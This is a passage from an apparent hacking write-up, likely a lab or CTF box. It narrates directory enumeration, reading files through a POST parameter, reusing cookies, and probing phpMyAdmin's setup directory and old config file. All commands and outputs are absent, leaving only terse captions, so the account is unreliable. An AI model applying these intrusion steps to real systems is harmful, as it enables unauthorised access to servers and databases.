... the webpage ;)
Yeah. So we should show some sql-ninja-rap-style... right?
Right? ;]
Checking:
phpmy directory revealed some more files, for example:
Next dir (with indexing enabled):
Let's rescan webserver with new param:
Checking:
More:
More:
Good. Next:
Trying harder... ;]
Checking:
Yes. So...
Maybe now it's the time to check the file parameter with POST?
What the hack!? ;[
After a while - reason was simple enough to proceed:
Now it's easier:
Checking more files:
What about c.php?
Let's check it:
We will back to it later... because I found this one response:
Checking:
Looks good. Reading the content of file:
Burp-point-of-view:
I decided to check it with my 'new' cookies:
Now we are here:
Ok, let's move to PMA for now. Checking password:
...and...
... after I tried few small tricks:
I decided to look around and grab some interesintg info (if there is any...;> )
Ok cool. I was wondering if there will be some kind of a PMA config to find and after a while I found setup directory:
Cool, but still not there.
you wish ;]
Next thing:
Good good, but we need to enable 'save' button first:
After no luck:
...I tried to read ('maybe' some) old config-file... This is what I found:
Checking:
Brak komentarzy:
Prześlij komentarz